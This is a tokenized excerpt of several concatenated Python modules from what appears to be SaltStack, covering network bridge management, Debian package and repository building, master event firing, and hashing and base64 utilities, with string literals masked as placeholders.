) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> start_int = False <EOL> brname = line . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> brs [ brname ] = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if '<STR_LIT>' in line : <EOL> start_int = True <EOL> continue <EOL> if start_int and brname : <EOL> m = re . match ( r'<STR_LIT>' , line ) <EOL> if m : <EOL> brs [ brname ] [ '<STR_LIT>' ] . append ( m . group ( <NUM_LIT:1> ) ) <EOL> if '<STR_LIT>' in line : <EOL> brs [ brname ] [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> if br : <EOL> try : <EOL> return brs [ br ] <EOL> except KeyError : <EOL> return None <EOL> return brs <EOL> def _bsd_bradd ( br ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> if not br : <EOL> return False <EOL> if __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( ifconfig , br ) , <EOL> python_shell = False ) != <NUM_LIT:0> : <EOL> return False <EOL> if kernel == '<STR_LIT>' : <EOL> brconfig = _tool_path ( '<STR_LIT>' ) <EOL> if __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brconfig , br ) , <EOL> python_shell = False ) != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def _bsd_brdel ( br ) : <EOL> '''<STR_LIT>''' <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> if not br : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( ifconfig , br ) , <EOL> python_shell = False ) <EOL> def _bsd_addif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , brcmd , iface ) , <EOL> python_shell = False ) <EOL> def _bsd_delif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> brcmd = '<STR_LIT>' <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , brcmd , iface ) , <EOL> python_shell = False ) <EOL> def _bsd_stp ( br , state , iface ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> else : <EOL> cmd = _tool_path ( '<STR_LIT>' ) <EOL> if not br or not iface : <EOL> return False <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( cmd , br , state , iface ) , <EOL> python_shell = False ) <EOL> def _os_dispatch ( func , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ [ '<STR_LIT>' ] in SUPPORTED_BSD_LIKE : <EOL> kernel = '<STR_LIT>' <EOL> else : <EOL> kernel = __grains__ [ '<STR_LIT>' ] . lower ( ) <EOL> _os_func = getattr ( sys . modules [ __name__ ] , '<STR_LIT>' . format ( kernel , func ) ) <EOL> if callable ( _os_func ) : <EOL> return _os_func ( * args , ** kwargs ) <EOL> def show ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def list_ ( ) : <EOL> '''<STR_LIT>''' <EOL> brs = _os_dispatch ( '<STR_LIT>' ) <EOL> if not brs : <EOL> return None <EOL> brlist = [ ] <EOL> for br in brs : <EOL> brlist . append ( br ) <EOL> return brlist <EOL> def interfaces ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> if not br : <EOL> return None <EOL> br_ret = _os_dispatch ( '<STR_LIT>' , br ) <EOL> if br_ret : <EOL> return br_ret [ '<STR_LIT>' ] <EOL> def find_interfaces ( * args ) : <EOL> '''<STR_LIT>''' <EOL> brs = _os_dispatch ( '<STR_LIT>' ) <EOL> if not brs : <EOL> return None <EOL> iflist = { } <EOL> for iface in args : <EOL> for br in brs : <EOL> try : <EOL> if iface in brs [ br ] [ '<STR_LIT>' ] : <EOL> iflist [ iface ] = br <EOL> except Exception : <EOL> pass <EOL> return iflist <EOL> def add ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def delete ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br ) <EOL> def addif ( br = None , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br , iface ) <EOL> def delif ( br = None , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> return _os_dispatch ( '<STR_LIT>' , br , iface ) <EOL> def stp ( br = None , state = '<STR_LIT>' , iface = None ) : <EOL> '''<STR_LIT>''' <EOL> kernel = __grains__ [ '<STR_LIT>' ] <EOL> if kernel == '<STR_LIT>' : <EOL> states = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return _os_dispatch ( '<STR_LIT>' , br , states [ state ] ) <EOL> elif kernel in SUPPORTED_BSD_LIKE : <EOL> states = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return _os_dispatch ( '<STR_LIT>' , br , states [ state ] , iface ) <EOL> else : <EOL> return False </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , print_function <EOL> import errno <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import shutil <EOL> import salt . utils <EOL> from salt . exceptions import SaltInvocationError <EOL> from salt . ext . six . moves . urllib . parse import urlparse as _urlparse <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ . get ( '<STR_LIT>' , False ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return __virtualname__ <EOL> return ( False , '<STR_LIT>' ) <EOL> def _get_build_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> env_override = '<STR_LIT>' <EOL> if env is None : <EOL> return env_override <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> for key , value in env . items ( ) : <EOL> env_override += '<STR_LIT>' . format ( key , value ) <EOL> env_override += '<STR_LIT>' . format ( key ) <EOL> return env_override <EOL> def _get_repo_options_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> env_options = '<STR_LIT>' <EOL> if env is None : <EOL> return env_options <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> for key , value in env . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> env_options += '<STR_LIT>' . format ( value ) <EOL> return env_options <EOL> def _get_repo_dists_env ( env ) : <EOL> '''<STR_LIT>''' <EOL> dflts_dict = { <EOL> '<STR_LIT>' : ( '<STR_LIT:I>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> env_dists = '<STR_LIT>' <EOL> codename = '<STR_LIT>' <EOL> dflts_keys = list ( dflts_dict . keys ( ) ) <EOL> if env is None : <EOL> for key , value in dflts_dict . items ( ) : <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , dflts_dict [ key ] [ <NUM_LIT:2> ] ) <EOL> if key == '<STR_LIT>' : <EOL> codename = dflts_dict [ key ] [ <NUM_LIT:2> ] <EOL> return ( codename , env_dists ) <EOL> if not isinstance ( env , dict ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> env_man_seen = [ ] <EOL> for key , value in env . items ( ) : <EOL> if key in dflts_keys : <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> env_man_seen . append ( key ) <EOL> if key == '<STR_LIT>' : <EOL> codename = value <EOL> if dflts_dict [ key ] [ <NUM_LIT:0> ] != '<STR_LIT:I>' : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , value ) <EOL> else : <EOL> env_dists += '<STR_LIT>' . format ( key , value ) <EOL> env_keys = list ( env . keys ( ) ) <EOL> for key in env_keys : <EOL> if key in dflts_keys and dflts_dict [ key ] [ <NUM_LIT:0> ] == '<STR_LIT:M>' and key not in env_man_seen : <EOL> env_dists += '<STR_LIT>' . format ( dflts_dict [ key ] [ <NUM_LIT:1> ] , dflts_dict [ key ] [ <NUM_LIT:2> ] ) <EOL> if key == '<STR_LIT>' : <EOL> codename = value <EOL> return ( codename , env_dists ) <EOL> def _create_pbuilders ( env ) : <EOL> '''<STR_LIT>''' <EOL> home = os . path . expanduser ( '<STR_LIT>' ) <EOL> pbuilderrc = os . path . join ( home , '<STR_LIT>' ) <EOL> if not os . path . isfile ( pbuilderrc ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> env_overrides = _get_build_env ( env ) <EOL> if env_overrides and not env_overrides . isspace ( ) : <EOL> with salt . utils . fopen ( pbuilderrc , '<STR_LIT:a>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( env_overrides ) ) <EOL> def _mk_tree ( ) : <EOL> '''<STR_LIT>''' <EOL> basedir = tempfile . mkdtemp ( ) <EOL> return basedir <EOL> def _get_spec ( tree_base , spec , template , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> spec_tgt = os . path . basename ( spec ) <EOL> dest = os . path . join ( tree_base , spec_tgt ) <EOL> return __salt__ [ '<STR_LIT>' ] ( spec , dest , saltenv = saltenv ) <EOL> def _get_src ( tree_base , source , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> parsed = _urlparse ( source ) <EOL> sbase = os . path . basename ( source ) <EOL> dest = os . path . join ( tree_base , sbase ) <EOL> if parsed . scheme : <EOL> __salt__ [ '<STR_LIT>' ] ( source , dest , saltenv = saltenv ) <EOL> else : <EOL> shutil . copy ( source , dest ) <EOL> def make_src_pkg ( dest_dir , spec , sources , env = None , template = None , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> _create_pbuilders ( env ) <EOL> tree_base = _mk_tree ( ) <EOL> ret = [ ] <EOL> if not os . path . isdir ( dest_dir ) : <EOL> os . makedirs ( dest_dir ) <EOL> spec_pathfile = _get_spec ( tree_base , spec , template , saltenv ) <EOL> if isinstance ( sources , str ) : <EOL> sources = sources . split ( '<STR_LIT:U+002C>' ) <EOL> for src in sources : <EOL> _get_src ( tree_base , src , saltenv ) <EOL> if spec_pathfile . endswith ( '<STR_LIT>' ) : <EOL> for efile in os . listdir ( tree_base ) : <EOL> full = os . path . join ( tree_base , efile ) <EOL> trgt = os . path . join ( dest_dir , efile ) <EOL> shutil . copy ( full , trgt ) <EOL> ret . append ( trgt ) <EOL> trgt = os . path . join ( dest_dir , os . path . basename ( spec_pathfile ) ) <EOL> shutil . copy ( spec_pathfile , trgt ) <EOL> ret . append ( trgt ) <EOL> return ret <EOL> salttarball = None <EOL> for afile in os . listdir ( tree_base ) : <EOL> if afile . startswith ( '<STR_LIT>' ) and afile . endswith ( '<STR_LIT>' ) : <EOL> salttarball = afile <EOL> break <EOL> else : <EOL> return ret <EOL> frontname = salttarball . split ( '<STR_LIT>' ) <EOL> salttar_name = frontname [ <NUM_LIT:0> ] <EOL> k = salttar_name . rfind ( '<STR_LIT:->' ) <EOL> debname = salttar_name [ : k ] + '<STR_LIT:_>' + salttar_name [ k + <NUM_LIT:1> : ] <EOL> debname += '<STR_LIT>' <EOL> debname_orig = debname + '<STR_LIT>' <EOL> abspath_debname = os . path . join ( tree_base , debname ) <EOL> cmd = '<STR_LIT>' . format ( salttarball ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( salttar_name , debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( os . path . join ( tree_base , debname_orig ) , debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( salttarball ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = tree_base ) <EOL> cmd = '<STR_LIT>' . format ( spec_pathfile , abspath_debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' . format ( spec_pathfile ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' . format ( os . path . basename ( spec_pathfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname ) <EOL> cmd = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = abspath_debname , python_shell = True ) <EOL> cmd = '<STR_LIT>' . format ( abspath_debname ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> for dfile in os . listdir ( tree_base ) : <EOL> if not dfile . endswith ( '<STR_LIT>' ) : <EOL> full = os . path . join ( tree_base , dfile ) <EOL> trgt = os . path . join ( dest_dir , dfile ) <EOL> shutil . copy ( full , trgt ) <EOL> ret . append ( trgt ) <EOL> return ret <EOL> def build ( runas , <EOL> tgt , <EOL> dest_dir , <EOL> spec , <EOL> sources , <EOL> deps , <EOL> env , <EOL> template , <EOL> saltenv = '<STR_LIT>' , <EOL> log_dir = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> try : <EOL> os . makedirs ( dest_dir ) <EOL> except OSError as exc : <EOL> if exc . errno != errno . EEXIST : <EOL> raise <EOL> dsc_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> dscs = make_src_pkg ( dsc_dir , spec , sources , env , template , saltenv ) <EOL> except Exception as exc : <EOL> shutil . rmtree ( dsc_dir ) <EOL> log . error ( '<STR_LIT>' ) <EOL> return ret <EOL> for dsc in dscs : <EOL> afile = os . path . basename ( dsc ) <EOL> adist = os . path . join ( dest_dir , afile ) <EOL> shutil . copy ( dsc , adist ) <EOL> if dsc . endswith ( '<STR_LIT>' ) : <EOL> dbase = os . path . dirname ( dsc ) <EOL> results_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( runas , dbase ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( runas , results_dir ) ) <EOL> cmd = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , runas = runas , python_shell = True ) <EOL> cmd = '<STR_LIT>' . format ( <EOL> dsc , results_dir ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , runas = runas , python_shell = True ) <EOL> for bfile in os . listdir ( results_dir ) : <EOL> full = os . path . join ( results_dir , bfile ) <EOL> bdist = os . path . join ( dest_dir , bfile ) <EOL> shutil . copy ( full , bdist ) <EOL> ret . setdefault ( '<STR_LIT>' , [ ] ) . append ( bdist ) <EOL> except Exception as exc : <EOL> log . error ( '<STR_LIT>' . format ( dsc , exc ) ) <EOL> finally : <EOL> shutil . rmtree ( results_dir ) <EOL> shutil . rmtree ( dsc_dir ) <EOL> return ret <EOL> def make_repo ( repodir , keyid = None , env = None ) : <EOL> '''<STR_LIT>''' <EOL> repoconf = os . path . join ( repodir , '<STR_LIT>' ) <EOL> if not os . path . isdir ( repoconf ) : <EOL> os . makedirs ( repoconf ) <EOL> codename , repocfg_dists = _get_repo_dists_env ( env ) <EOL> repoconfdist = os . path . join ( repoconf , '<STR_LIT>' ) <EOL> with salt . utils . fopen ( repoconfdist , '<STR_LIT:w>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( repocfg_dists ) ) <EOL> if keyid is not None : <EOL> with salt . utils . fopen ( repoconfdist , '<STR_LIT:a>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( keyid ) ) <EOL> repocfg_opts = _get_repo_options_env ( env ) <EOL> repoconfopts = os . path . join ( repoconf , '<STR_LIT>' ) <EOL> with salt . utils . fopen ( repoconfopts , '<STR_LIT:w>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( repocfg_opts ) ) <EOL> for debfile in os . listdir ( repodir ) : <EOL> if debfile . endswith ( '<STR_LIT>' ) : <EOL> cmd = '<STR_LIT>' . format ( codename , os . path . join ( repodir , debfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = repodir ) <EOL> if debfile . endswith ( '<STR_LIT>' ) : <EOL> cmd = '<STR_LIT>' . format ( codename , os . path . join ( repodir , debfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = repodir ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import collections <EOL> import logging <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import salt . crypt <EOL> import salt . utils . event <EOL> import salt . payload <EOL> import salt . transport <EOL> import salt . ext . six as six <EOL> __proxyenabled__ = [ '<STR_LIT:*>' ] <EOL> log = logging . getLogger ( __name__ ) <EOL> def _dict_subset ( keys , master_dict ) : <EOL> '''<STR_LIT>''' <EOL> return dict ( [ ( k , v ) for k , v in six . iteritems ( master_dict ) if k in keys ] ) <EOL> def fire_master ( data , tag , preload = None ) : <EOL> '''<STR_LIT>''' <EOL> if __opts__ . get ( '<STR_LIT>' , None ) : <EOL> log . warning ( '<STR_LIT>' . format ( tag ) ) <EOL> return False <EOL> if __opts__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> channel = salt . transport . Channel . factory ( __opts__ ) <EOL> load = { '<STR_LIT:id>' : __opts__ [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> try : <EOL> channel . send ( load ) <EOL> except Exception : <EOL> pass <EOL> return True <EOL> if preload or __opts__ . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> if '<STR_LIT>' not in __opts__ : <EOL> __opts__ [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> ip = salt . utils . ip_bracket ( __opts__ [ '<STR_LIT>' ] ) , <EOL> port = __opts__ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> auth = salt . crypt . SAuth ( __opts__ ) <EOL> load = { '<STR_LIT:id>' : __opts__ [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : auth . gen_token ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if isinstance ( preload , dict ) : <EOL> load . update ( preload ) <EOL> channel = salt . transport . Channel . factory ( __opts__ ) <EOL> try : <EOL> channel . send ( load ) <EOL> except Exception : <EOL> pass <EOL> return True <EOL> else : <EOL> try : <EOL> return salt . utils . event . MinionEvent ( __opts__ , listen = False ) . fire_event ( <EOL> { '<STR_LIT:data>' : data , '<STR_LIT>' : tag , '<STR_LIT>' : None , '<STR_LIT>' : None } , '<STR_LIT>' ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> lines = traceback . format_exception ( exc_type , exc_value , exc_traceback ) <EOL> log . debug ( lines ) <EOL> return False <EOL> def fire ( data , tag ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> event = salt . utils . event . get_event ( '<STR_LIT>' , <EOL> sock_dir = __opts__ [ '<STR_LIT>' ] , <EOL> transport = __opts__ [ '<STR_LIT>' ] , <EOL> opts = __opts__ , <EOL> listen = False ) <EOL> return event . fire_event ( data , tag ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> lines = traceback . format_exception ( exc_type , exc_value , exc_traceback ) <EOL> log . debug ( lines ) <EOL> return False <EOL> def send ( tag , <EOL> data = None , <EOL> preload = None , <EOL> with_env = False , <EOL> with_grains = False , <EOL> with_pillar = False , <EOL> with_env_opts = False , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> data_dict = { } <EOL> if with_env : <EOL> if isinstance ( with_env , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_env , dict ( os . environ ) ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = dict ( os . environ ) <EOL> if with_grains : <EOL> if isinstance ( with_grains , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_grains , __grains__ ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = __grains__ <EOL> if with_pillar : <EOL> if isinstance ( with_pillar , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_pillar , __pillar__ ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = __pillar__ <EOL> if with_env_opts : <EOL> data_dict [ '<STR_LIT>' ] = __opts__ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data_dict [ '<STR_LIT>' ] = __opts__ . get ( '<STR_LIT>' ) <EOL> if kwargs : <EOL> data_dict . update ( kwargs ) <EOL> if isinstance ( data , collections . Mapping ) : <EOL> data_dict . update ( data ) <EOL> return fire_master ( data_dict , tag , preload = preload ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import base64 <EOL> import hashlib <EOL> import hmac <EOL> import StringIO <EOL> import salt . exceptions <EOL> import salt . ext . six as six <EOL> import salt . utils <EOL> def digest ( instr , checksum = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> hashing_funcs = { <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> } <EOL> hash_func = hashing_funcs . get ( checksum ) <EOL> if hash_func is None : <EOL> raise salt . exceptions . CommandExecutionError ( <EOL> "<STR_LIT>" . format ( checksum ) ) <EOL> return hash_func ( instr ) <EOL> def digest_file ( infile , checksum = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if not __salt__ [ '<STR_LIT>' ] ( infile ) : <EOL> raise salt . exceptions . CommandExecutionError ( <EOL> "<STR_LIT>" . format ( infile ) ) <EOL> with open ( infile , '<STR_LIT:rb>' ) as f : <EOL> file_hash = __salt__ [ '<STR_LIT>' ] ( f . read ( ) , checksum ) <EOL> return file_hash <EOL> def base64_b64encode ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> b64 = base64 . b64encode ( b ) <EOL> return salt . utils . to_str ( b64 ) <EOL> return base64 . b64encode ( instr ) <EOL> def base64_b64decode ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> data = base64 . b64decode ( b ) <EOL> try : <EOL> return salt . utils . to_str ( data ) <EOL> except UnicodeDecodeError : <EOL> return data <EOL> return base64 . b64decode ( instr ) <EOL> def base64_encodestring ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> b64 = base64 . encodebytes ( b ) <EOL> return salt . utils . to_str ( b64 ) <EOL> return base64 . encodestring ( instr ) <EOL> def base64_encodefile ( fname ) : <EOL> '''<STR_LIT>''' <EOL> encoded_f = StringIO . StringIO ( ) <EOL> with open ( fname , '<STR_LIT:rb>' ) as f : <EOL> base64 . encode ( f , encoded_f ) <EOL> encoded_f . seek ( <NUM_LIT:0> ) <EOL> return encoded_f . read ( ) <EOL> def base64_decodestring ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> data = base64 . decodebytes ( b ) <EOL> try : <EOL> return salt . utils . to_str ( data ) <EOL> except UnicodeDecodeError : <EOL> return data <EOL> return base64 . decodestring ( instr ) <EOL> def base64_decodefile ( instr , outfile ) : <EOL> r'''<STR_LIT>''' <EOL> encoded_f = StringIO . StringIO ( instr ) <EOL> with open ( outfile , '<STR_LIT:wb>' ) as f : <EOL> base64 . decode ( encoded_f , f ) <EOL> return True <EOL> def md5_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . md5 ( b ) . hexdigest ( ) <EOL> return hashlib . md5 ( instr ) . hexdigest ( ) <EOL> def sha256_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . sha256 ( b ) . hexdigest ( ) <EOL> return hashlib . sha256 ( instr ) . hexdigest ( ) <EOL> def sha512_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . sha512 ( b ) . hexdigest ( ) <EOL> return hashlib . sha512 ( instr ) . hexdigest ( ) <EOL> def hmac_signature ( string , shared_secret , challenge_hmac ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> msg = salt . utils . to_bytes ( string ) <EOL> key = salt . utils . to_bytes ( shared_secret ) <EOL> challenge = salt . utils . to_bytes ( challenge_hmac ) <EOL> else : <EOL> msg = string <EOL> key = shared_secret <EOL> challenge = challenge_hmac <EOL> hmac_hash = hmac . new ( key , msg , hashlib . sha256 ) <EOL> valid_hmac = base64 . b64encode ( hmac_hash . digest ( ) ) <EOL> return valid_hmac == challenge </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import json <EOL> from lxml import etree <EOL> try : <EOL> from jnpr . junos import Device <EOL> from jnpr . junos . utils . sw import SW <EOL> from jnpr . junos . utils . scp import SCP <EOL> import jnpr . junos . utils <EOL> import jnpr . junos . cfg <EOL> HAS_JUNOS = True <EOL> except ImportError : <EOL> HAS_JUNOS = False <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> __proxyenabled__ = [ '<STR_LIT>' ] <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if HAS_JUNOS and '<STR_LIT>' in __opts__ : <EOL> return __virtualname__ <EOL> else : <EOL> return ( False , '<STR_LIT>' ) <EOL> def facts_refresh ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> ret [ '<STR_LIT:message>' ] = conn . facts_refresh ( ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def facts ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = json . dumps ( conn . facts ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> return ret <EOL> def call_rpc ( cmd = None , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> op = dict ( ) <EOL> if '<STR_LIT>' in kwargs and isinstance ( kwargs [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , dict ) : <EOL> op . update ( kwargs [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] ) <EOL> else : <EOL> op . update ( kwargs ) <EOL> for k , v in op . iteritems ( ) : <EOL> op [ k ] = str ( v ) <EOL> op [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> try : <EOL> if cmd in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> filter_reply = None <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> filter_reply = etree . XML ( args [ <NUM_LIT:0> ] ) <EOL> ret [ '<STR_LIT:message>' ] = getattr ( conn . rpc , cmd . replace ( '<STR_LIT:->' , 